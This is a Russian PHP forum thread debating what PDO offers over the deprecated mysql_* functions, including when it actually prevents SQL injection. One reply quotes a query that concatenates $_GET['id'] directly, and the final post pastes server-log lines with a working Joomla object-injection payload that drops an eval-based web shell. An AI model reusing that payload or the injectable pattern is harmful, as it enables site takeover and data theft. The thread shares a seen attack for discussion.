PHP PDO

0

2

Я один такой слоупок, узнавший о PDO только сейчас, до этого юзавший mysql? В чем профит PDO, приведите примеры. Пока профит вижу только в отсутствии заморочки с разным типом субд, а в чем еще?

Ссылка

←	PHP и закрывающий тег

Что должен знать middle php developer

→

PDO
2016

Эй, Мойдодыр! Принимай пополнение.

ritsufag ★★★★★
(29.10.16 18:42:42 MSK)

Ссылка

Почему бы тебе не потратить своё время на более полезные вещи? Например на разъяснения своим 67ми клиентам разницы между фрейворком и ЯП на котором он написан, вместо обливания жиром мониторов Лоровцев?

ilinsky ★★★★★
(29.10.16 18:46:48 MSK)
Последнее исправление: ilinsky 29.10.16 18:49:45 MSK (всего исправлений: 1)

Ответ на: комментарий от ilinsky 29.10.16 18:46:48 MSK

Я новичок в php, до этого верстальщиком всегда был.

pleiotropy
(29.10.16 18:51:04 MSK) автор топика

Ответ на: комментарий от pleiotropy 29.10.16 18:51:04 MSK

Это как-то мешает нагуглить phptherightway и не задавать тупых вопросов?

ritsufag ★★★★★
(29.10.16 18:53:19 MSK)

Ссылка

PDO это прежде всего отсутствие sql иньекций, так как параметры в запрос передаются через переменные. Удобная работа с базами https://habrahabr.ru/post/137664/

ism ★★★
(29.10.16 19:03:13 MSK)

Ответ на: комментарий от ism 29.10.16 19:03:13 MSK

только если с prepare иначе возможность инъекций остается

anonymous
(29.10.16 19:37:41 MSK)

Ссылка

PDO - это универсальная обёртка над API для доступа к базам данных, она умеет работать не только не мускулом, но и с другими БД. Дизайн у неё конечно кромешное говно, но лучше там ничего нет, в принципе терпимо. Альтернатива - mysqli. А вот функции типа mysql_* - это уже давно deprecated вещи и кажется их уже дропнули ЕМНИП.

~~chuppa~~
(29.10.16 20:16:10 MSK)

узнавший о PDO только сейчас, до этого юзавший mysql

facepalm.pcx

В чем профит PDO, приведите примеры

Внезапно, ООП.

no-such-file ★★★★★
(29.10.16 21:09:01 MSK)

Ссылка

Ответ на: комментарий от ism 29.10.16 19:03:13 MSK

Сейчас ОП станет слоупоком, только что узнавшим об иньекциях :)

goingUp ★★★★★
(30.10.16 02:36:39 MSK)

Ответ на: комментарий от goingUp 30.10.16 02:36:39 MSK

OH SHI~~

no-such-file ★★★★★
(30.10.16 03:17:48 MSK)

Ссылка

Я один такой слоупок, узнавший о PDO только сейчас, до этого юзавший mysql?

С учётом того, что mysql_* уже вообще depricated — да :)

Вышел релиз PHP 5.1.0

~~KRoN73~~ ★★★★★
(30.10.16 17:26:45 MSK)

Ссылка

Ответ на: комментарий от ism 29.10.16 19:03:13 MSK

PDO это прежде всего отсутствие sql иньекций

При прямых руках инъекций нет и в mysql_*, при кривых инъекции будут и с PDO :) Я уже видел код в духе

$conn->query("SELECT * FROM posts WHERE id=".$_GET['id']);

~~KRoN73~~ ★★★★★
(30.10.16 17:29:24 MSK)

Ссылка

Сегодня вот такое в логах увидел:

10.20.0.1 - - [30/Oct/2016:13:39:00 +0000] "GET / HTTP/1.0" 200 91127 [-] "-" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:237:\x22file_put_contents($_SERVER[\x22DOCUMENT_ROOT\x22].chr(47).\x22indax.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['dmg'];if(\x5Cx24mujj!=''){\x5Cx24xsser=base64_decode(\x5Cx24_POST['z0']);@eval(\x5C\x22\x5C\x5C\x5Cx24safedg=\x5Cx24xsser;\x5C\x22);}\x22);JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}~\xD9" "62.210.162.31"
10.20.0.1 - - [30/Oct/2016:13:39:06 +0000] "GET / HTTP/1.0" 200 91124 [-] "-" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:237:\x22file_put_contents($_SERVER[\x22DOCUMENT_ROOT\x22].chr(47).\x22indax.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['dmg'];if(\x5Cx24mujj!=''){\x5Cx24xsser=base64_decode(\x5Cx24_POST['z0']);@eval(\x5C\x22\x5C\x5C\x5Cx24safedg=\x5Cx24xsser;\x5C\x22);}\x22);JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}~\xD9" "62.210.162.31"

Жто ваше PDO спасёт от подобного?

EXL ★★★★★
(30.10.16 17:33:02 MSK)